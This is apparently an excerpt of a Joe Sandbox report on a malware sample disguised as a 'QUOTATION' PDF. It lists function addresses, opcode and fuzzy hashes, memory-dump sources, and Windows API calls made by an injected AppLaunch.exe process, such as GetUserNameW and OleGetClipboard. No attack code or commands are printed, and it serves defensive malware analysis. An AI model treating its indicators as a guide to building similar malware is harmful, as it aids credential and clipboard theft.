Instruction ID: ab0a503d55372b795ec22924d4c25b717ab66a8394e8252bd4783f1e50b900e7
Opcode Fuzzy Hash: 950df739c2389de0a6ba1801cd78a94c30cf5b6092a43463a565ffd16efafe69
Instruction Fuzzy Hash: A5F05E353106109FC714DB19D454D2A77AAEFC8721B108069F9468B360CE31EC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C08BF1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ea378974dde6f4de276c0d63d3c992c093c62deca8d0831aa40db0fd9f5896
Instruction ID: f4c444f3cbdb4177289798c028cb377b405f572163e2291d40542dc45968315f
Opcode Fuzzy Hash: 52ea378974dde6f4de276c0d63d3c992c093c62deca8d0831aa40db0fd9f5896
Instruction Fuzzy Hash: 9BF0E276A042549BCB558A78D8805EABFF9EB49230F08817AD995E7341EA3198058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 05C0FA10 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa25c2db518ae154786367c2c11e9fb89f6ef3d575d3ac1f3c4b43443004827
Instruction ID: 28d1fa945c5c79785d4100299e2762b441fbf06b6f0e5ecb3367018069508c8a
Opcode Fuzzy Hash: daa25c2db518ae154786367c2c11e9fb89f6ef3d575d3ac1f3c4b43443004827
Instruction Fuzzy Hash: FEF0D0393142508FC715CB98E588F697BE9E78C722F498056F509C7362CB75DC85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C04547 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148067db160617c4ababc5a2366a9ef5dec6e6bb918b72d729e4dbbd87de313e
Instruction ID: 1e7823cb7785d97276111393edbc05a2d5dc74e3cece6f8ae239847f5dca6674
Opcode Fuzzy Hash: 148067db160617c4ababc5a2366a9ef5dec6e6bb918b72d729e4dbbd87de313e
Instruction Fuzzy Hash: BCF0A7322093958BC7138B3DDA9944BBFAAAFD1250304C976E146CB127CE30A81B8790

Uniqueness

Uniqueness Score: -1.00%

Function 05C0F993 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a467f9914973f8f21b298fe68dd6069584e0c138e643dcfb870bbabb27957348
Instruction ID: 740c7c19a477f1e2489207bc7a330edf9c0871141ff0088436305bffd77cfd03
Opcode Fuzzy Hash: a467f9914973f8f21b298fe68dd6069584e0c138e643dcfb870bbabb27957348
Instruction Fuzzy Hash: 48F03A306262819BDE08DBF9E05973D7AA2AB65201B844D6DE407DB3D0EE7698C48B45

Uniqueness

Uniqueness Score: -1.00%

Function 05C0EEF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117023ed8ce6ee7fba6426a868cfde89e3ac55194ca71968c6b54b22ec1d1735
Instruction ID: 4a6cb51693cfa6abf63284597a774d014eb554458bfdc6dcb54a451dc62c8282
Opcode Fuzzy Hash: 117023ed8ce6ee7fba6426a868cfde89e3ac55194ca71968c6b54b22ec1d1735
Instruction Fuzzy Hash: 7CF08C34D08218DFC7A0DBADD044AAAB7F9FB08310F019865D508D3291D334AE40CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 05C05FA0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392fae1e2aeaba9670541d7b319da847c70effe7a9650a1a92891dcf97ebf0d5
Instruction ID: ac6e4898d5441566c6b313d6c31e372965c68ba2990986cb758ac3d35ae3ab1b
Opcode Fuzzy Hash: 392fae1e2aeaba9670541d7b319da847c70effe7a9650a1a92891dcf97ebf0d5
Instruction Fuzzy Hash: 57E0922614C2C08FC343873C68522A33FB19F8B01071858D5E0D9C3623C0145A1BEB75

Uniqueness

Uniqueness Score: -1.00%

Function 05C07F20 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8352152c1cb229637a2b598871335724a175f920f073a757e2773307c2b6fa
Instruction ID: 6030c0c53a2507e6ddc7d1d2b41fa94cdaae24ef8f53a946bf381fd92ccbc278
Opcode Fuzzy Hash: 0d8352152c1cb229637a2b598871335724a175f920f073a757e2773307c2b6fa
Instruction Fuzzy Hash: D0E02632B042046BD7049BAFE405BDEBBEACBC8720F00802AF509C7380DEB559028B90

Uniqueness

Uniqueness Score: -1.00%

Function 05C0F9A0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b28beab838d51d67f6d5adb273820023eb2bafe697c9a3d12acd00d3b587d7
Instruction ID: e39204ff05fcdaf33437ad782314808cf6c2990acfbe94ff2dcb41209d812403
Opcode Fuzzy Hash: a1b28beab838d51d67f6d5adb273820023eb2bafe697c9a3d12acd00d3b587d7
Instruction Fuzzy Hash: FDE08C306262409B8E08EBF9E05953D7AA6AB546003804C6CE4039B3D0DE72ACC08784

Uniqueness

Uniqueness Score: -1.00%

Function 05C04558 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d8522bf5a1f1138863cd52ef1aa2e41b5bec26224dfa6f7f5731d0a42f947d
Instruction ID: 5941c7cc9bd61c6408e2d14f7423fee8b70c8b4db0743678fc9886d447a35939
Opcode Fuzzy Hash: c6d8522bf5a1f1138863cd52ef1aa2e41b5bec26224dfa6f7f5731d0a42f947d
Instruction Fuzzy Hash: D7E0923220024947C7219A2EE98984BFB9AEFD0260300C939E00A87211CE71A80A8690

Uniqueness

Uniqueness Score: -1.00%

Function 05C072DD Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625b06d33ceb424b854e7ac2493bedc51c82be16d222511ec45431f040f8f07b
Instruction ID: 2c4371fa5ecee2b9439e7a9ec47e74edc933244428bab118d02716c859716454
Opcode Fuzzy Hash: 625b06d33ceb424b854e7ac2493bedc51c82be16d222511ec45431f040f8f07b
Instruction Fuzzy Hash: 9DE07D7BB040048B8F05CE1CE4810DEBBB1EB8D3107104025F981C3302C6304A1BE7D0

Uniqueness

Uniqueness Score: -1.00%

Function 05C0BCD0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37f1de616468442805ba87c7d307fc836a4220cff38261b6e1c0aecab41d28e
Instruction ID: 2a5574a76449ac1290e060f4c0a0018383c8fdc0fb66becd1f3576e367ae2c9d
Opcode Fuzzy Hash: f37f1de616468442805ba87c7d307fc836a4220cff38261b6e1c0aecab41d28e
Instruction Fuzzy Hash: 8CD05EB100E2A08FC702CB34C8626457F70EE0730830944E6C0808B562D334F467C751

Uniqueness

Uniqueness Score: -1.00%

Function 05C07CC0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe786489723945a7d0ec2968330e6cfffaa6ceac78b63b007bcee3af123ef604
Instruction ID: 4bc66450759f324b9c4db5720ef2a046a53108635fe5a6653a8a9ae1f13f0d03
Opcode Fuzzy Hash: fe786489723945a7d0ec2968330e6cfffaa6ceac78b63b007bcee3af123ef604
Instruction Fuzzy Hash: 2ED012B61091504FC711C774EE4AC117B789F1632131540D7F148CF176C224DD54C715

Uniqueness

Uniqueness Score: -1.00%

Function 05C0A610 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0952d35763cc0433c0be706dee2bbfda99ad6d861c039fb8a08ec5b1dbfb0a
Instruction ID: 68d35dd971f922f26761c0ac8fed3adddd5f519f57def1fc9a3a645815af5ba3
Opcode Fuzzy Hash: 1b0952d35763cc0433c0be706dee2bbfda99ad6d861c039fb8a08ec5b1dbfb0a
Instruction Fuzzy Hash: 42D0C9310493C09FDB079734A4A42A63F746E0730431990D7D0888B167CA12140ADB21

Uniqueness

Uniqueness Score: -1.00%

Function 05C0C3A3 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ddd1c25d22ac48cca66871c2f93e31de15cbb4400564332748cb25cee086cae
Instruction ID: a5ed359d40061d8d9664f78098e2de51ce4ab180d6e1f4daa521314826378977
Opcode Fuzzy Hash: 8ddd1c25d22ac48cca66871c2f93e31de15cbb4400564332748cb25cee086cae
Instruction Fuzzy Hash: 21C08C320C82880FC30147A09EE31553BA9A80230035C0483D0888B673C119912B8240

Uniqueness

Uniqueness Score: -1.00%

Function 05C0A30A Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1455b9e465ce7ab8ed1ce941105a2017edb58fa6b1e5d57e2cf78b958f7e0eca
Instruction ID: cb6c45afce7f64e816219184c66cc111d4557d210bf9e4a2d88c91ad21d75955
Opcode Fuzzy Hash: 1455b9e465ce7ab8ed1ce941105a2017edb58fa6b1e5d57e2cf78b958f7e0eca
Instruction Fuzzy Hash: 20C01231104288BFCB01DF24D848E45BFA8AF0B320F0940E4F9844B232D272E814DA41

Uniqueness

Uniqueness Score: -1.00%

Function 05C07CD0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Uniqueness

Uniqueness Score: -1.00%

Function 05C0A310 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94

Uniqueness

Uniqueness Score: -1.00%

Function 05C0C3E8 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 296dca69d1fcb6089747c2504f367b02914a64f06aed91f834e4270947ef2072
Instruction ID: e108647703395fc34bbd0446d13b7caee31a25fe7a4654eb6837f02ee5018717
Opcode Fuzzy Hash: 296dca69d1fcb6089747c2504f367b02914a64f06aed91f834e4270947ef2072
Instruction Fuzzy Hash: F9B09232000208AB8A109E84E804865BBA9AB59600750C025F609061228B33A862DB94

Uniqueness

Uniqueness Score: -1.00%

Function 05C0A620 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b227ebc75fbd5c13ccf0d79809fd3df92576fc559cc13a3233078dccdcbab2
Instruction ID: c4eb01db1e1ed81150ebbbde02312293c5d09e4c15f609d281253e2502b11092
Opcode Fuzzy Hash: f7b227ebc75fbd5c13ccf0d79809fd3df92576fc559cc13a3233078dccdcbab2
Instruction Fuzzy Hash: 16A01230000308C782105A54E405420779CB7445047944094E00D031214B13B8028680

Uniqueness

Uniqueness Score: -1.00%

Function 05C0C3B0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ce6abf6a759f981f4de05978586c15cc5bf813c9657bd43962e38c7259ac4d
Instruction ID: c368126bdd09e6fd5596eb45d30f64cec74a309adf1867aaac4e8bee0e7f7501
Opcode Fuzzy Hash: 18ce6abf6a759f981f4de05978586c15cc5bf813c9657bd43962e38c7259ac4d
Instruction Fuzzy Hash: 81A0243000030CDFC5105F44F40547077DCD7445153504054F00D035114F13FC41C7C0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05C0DAD0 Relevance: 1.7, Strings: 1, Instructions: 484COMMON

Download Yara Rule

Strings

(4q, xrefs: 05C0E053

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (4q
API String ID: 0-3825661732
Opcode ID: bdbe083cc17b28dbfe5c7da0372a0fa62b4c083881eb2c1966d4874bad017be4
Instruction ID: 200bfa858f832f3c5c235b2fd332302651a9fa83a3358010eb198099c063037c
Opcode Fuzzy Hash: bdbe083cc17b28dbfe5c7da0372a0fa62b4c083881eb2c1966d4874bad017be4
Instruction Fuzzy Hash: 6E126B74B012168FCB19DFA9C494A3EFBF6BF88304F148929E55AD7384CB35A905DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C04B30 Relevance: 7.9, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

4'0q, xrefs: 05C04BE4
4'0q, xrefs: 05C04BB4
4'0q, xrefs: 05C04C02
p4q, xrefs: 05C04C87
(4q, xrefs: 05C04CFA
4'0q, xrefs: 05C04C7A

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (4q$4'0q$4'0q$4'0q$4'0q$p4q
API String ID: 0-818507469
Opcode ID: c203ea337d023460e4f951ae4a73e294cd3383d631f7fef62df7f08240d46416
Instruction ID: 0cbaebba2829d88c15aede88a11e189d940ea2bc18218d75d56cc7772f301aa7
Opcode Fuzzy Hash: c203ea337d023460e4f951ae4a73e294cd3383d631f7fef62df7f08240d46416
Instruction Fuzzy Hash: C6D15F366002159FCF1ACFA5C944D9ABBB6FF48314F0544A8E6096B272C732ED55DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C0B400 Relevance: 5.2, Strings: 4, Instructions: 185COMMON

Download Yara Rule

Strings

(_0q, xrefs: 05C0BB03
(_0q, xrefs: 05C0BAB3
(_0q, xrefs: 05C0BB39
(_0q, xrefs: 05C0BABD

Memory Dump Source

Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd

Similarity

API ID:
String ID: (_0q$(_0q$(_0q$(_0q
API String ID: 0-1939656205
Opcode ID: a03dcbb4851f7741d7c04b8f9c21dc3004eae412c58accaac598182ce9b3ffd7
Instruction ID: 4c229d079b1248f3310038d21c18643df378600c5736c24a00a9a475f104d196
Opcode Fuzzy Hash: a03dcbb4851f7741d7c04b8f9c21dc3004eae412c58accaac598182ce9b3ffd7
Instruction Fuzzy Hash: 0D61F274B042408FCB05EB78C4645AD7FB2EF86308F1598AAE5469B3A2DB35DD45CB90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 3928, Parent PID: 5436COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.7%
Total number of Nodes:	426
Total number of Limit Nodes:	48

Executed Functions

Function 00FC679C Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 00FC7253

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 1a52d072127032d8d3c62ff8634f4db276e3476edc3fa9fd8183ef330a7c35fd
Instruction ID: 37ddb392cff07d1929040323db872c7691aa32e2bfb39a01f4f03e51259dd17e
Opcode Fuzzy Hash: 1a52d072127032d8d3c62ff8634f4db276e3476edc3fa9fd8183ef330a7c35fd
Instruction Fuzzy Hash: D8511071D043198FDB14DFAAC989B9DBBB1BB48310F18851DE815AB390D774A844CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0A59EA7C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0A59FEB1

Strings

DGP, xrefs: 0A59EA7C

Memory Dump Source

Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd

Similarity

API ID: CallProcWindow
String ID: DGP
API String ID: 2714655100-445202297
Opcode ID: 6647892eabd6e69ebfbac715226909c4ddf7ef69015b0039f866d2027dc45675
Instruction ID: e842fe1d4d4aa7e43a9a18e246b07b9f808d19b211820304eea4399630755a94
Opcode Fuzzy Hash: 6647892eabd6e69ebfbac715226909c4ddf7ef69015b0039f866d2027dc45675
Instruction Fuzzy Hash: A94138B4900309DFCB54CF99C888AAABFF5FF88314F258859D519AB321C734A845CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FC710D Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 00FC7253

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 815f7f1d57c89ae5d26821ca39b47f55c948d71e7250dd9c70c5b2005540c3a7
Instruction ID: 21bee3d55fca56d9410a71db84c9648e63a60cd441500f34dea2c1974710fadc
Opcode Fuzzy Hash: 815f7f1d57c89ae5d26821ca39b47f55c948d71e7250dd9c70c5b2005540c3a7
Instruction Fuzzy Hash: 85510170D0421A8FDB14DFA9C989B9DBBB1BF48310F14852EE815AB291D7749844DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00FC67B4 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 00FC7253

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 67bac4c27ce9a1eda4e1dd5dad177d8e0fdaad8d03a4d002da3c0409f025b428
Instruction ID: 93100872710d5d3f548d8a6b85bf28305105c426f6ac0ab657899cc219afb9a6
Opcode Fuzzy Hash: 67bac4c27ce9a1eda4e1dd5dad177d8e0fdaad8d03a4d002da3c0409f025b428
Instruction Fuzzy Hash: 66510070D043198FDB18DFAAC989BDDBBB1BB48310F58852EE815AB391D774A844CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0A59B04C Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0A59B16A

Memory Dump Source

Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 86ed78bd86bfaa8c5c35c6af4eeff6db46ab762192fe5716805631fdd082d8b2
Instruction ID: ea1c0c6fef6b4978beee7692574a110b258e9192d5f3308b8ac48d4c66103480
Opcode Fuzzy Hash: 86ed78bd86bfaa8c5c35c6af4eeff6db46ab762192fe5716805631fdd082d8b2
Instruction Fuzzy Hash: 8351C0B1D103099FDF14CF9AD984ADEBFB5BF48310F65812AE818AB210D771A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0A59B058 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0A59B16A

Memory Dump Source

Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9c17461c9b5cb88d2d7d5118ad1caf4ab219b2c6516971b26672c96d160e19c2
Instruction ID: e281bd5d80f26e0cdce5d7600d8dd128e09feebea9ad9e2b3215b70a4c4c67c4
Opcode Fuzzy Hash: 9c17461c9b5cb88d2d7d5118ad1caf4ab219b2c6516971b26672c96d160e19c2
Instruction Fuzzy Hash: E741BFB1D103099FDF14CF9AD984ADEBFB5BF48310F65812AE818AB210D775A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FCF62C Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 00FCF6C0

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: d9e98f7037484b691c51dfd39b1e48a6ad5644714112db3543b436d57f31270b
Instruction ID: cb24b845eb5b0a6bb7534b6ceeda7b1bdc4c40626162640a230f03908098418c
Opcode Fuzzy Hash: d9e98f7037484b691c51dfd39b1e48a6ad5644714112db3543b436d57f31270b
Instruction Fuzzy Hash: 4E3114B0D01249EFDB24CFA9DA85BDEBBF5AF48314F248069E404AB391C775984ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00FCEFE4 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 00FCF6C0

Memory Dump Source

Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: b2588855b825d33d2c1c277c973ced873bd551c7b3dc4c32e06d31eb429a3b69
Instruction ID: 0829fb6aabba8ca9fe9bb882b376cc9af9b49b2a08fdf12e040cafbad7e99f5f
Opcode Fuzzy Hash: b2588855b825d33d2c1c277c973ced873bd551c7b3dc4c32e06d31eb429a3b69
Instruction Fuzzy Hash: 67311670D01249DFDB14DF99CA85BDEFBF5AF48314F248029E404AB390D7749849CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0A59EF48 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0A59EFD7

Memory Dump Source

Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6955ec1fee636de557b868f6fc2b0794f755d632e4c427c3060a9e63e5a90467
